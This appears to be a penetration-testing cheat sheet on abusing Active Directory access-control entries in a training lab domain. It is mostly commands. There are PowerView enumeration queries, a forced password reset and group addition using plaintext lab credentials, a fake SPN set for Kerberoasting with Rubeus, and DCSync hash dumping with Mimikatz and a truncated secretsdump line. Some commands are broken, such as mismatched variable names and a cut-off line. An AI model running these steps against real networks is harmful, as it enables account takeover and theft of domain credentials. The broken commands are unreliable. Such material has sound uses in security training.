Comment on page

Access Control Lists and Entries (ACL & ACE)

ACL Enumeration

Find Interesting ACL

# Find ACL
# More Effectively, filter by user(s) we have control
$sid = Convert-NameToSid <username>
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
# Reverse GUID (ObjectAceType)
$guid= <ObjectAceType-Value>
Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl
# Powerview All in 1 Command
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

Show All Rights That User Has

# Create Variable
$user-priv = Convert-NameToSid damundsen
# Show Rights
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $user-priv2} -Verbose | select AceType, ObjectDN, ActiveDirectoryRights

Enumerate Nested Group

# Check Nested Group of HelpDesk
Get-DomainGroup -Identity "Help Desk Level 1" | select memberof
# Check Discovered Nested Group
$itgroupsid = Convert-NameToSid "Information Technology"
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $itgroupsid} -Verbose | select AceType, ObjectDN, ActiveDirectoryRight
# Discoveed Object DN Enumeration
$adunnsid = Convert-NameToSid adunn
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $adunnsid} -Verbose

Abusing ACL

Change Password

# PowerShell Console As Desired User
$SecPassword = ConvertTo-SecureString 'transporter@4' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
# Creating Password for Target User
$Password = ConvertTo-SecureString '0xF0rk123!' -AsPlainText -Force
# Create Password
Set-DomainUserPassword -Identity damundsen -AccountPassword $Password -Credential $Cred -Verbose
$Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
# Add User to Group
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose
# Verify User is Added
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName

Create Fake SPN - GenericWrite

# Create SPN
Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
# Get User Hash
.\Rubeus.exe kerberoast /user:adunn /nowrap

Cleaning Up

# Remove SPN
Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose
# Remove User From Group
Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose



Enumeration Steps

# List Group Membership
Get-DomainUser -Identity adunn |select samaccountname,objectsid,memberof
# Review ObjectSID
$sid= "<Value-sid-bject>"
# Verify DC-Sync Rights
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl

Exploitation Steps -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/[email protected]


# Mimikatz DCSync
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator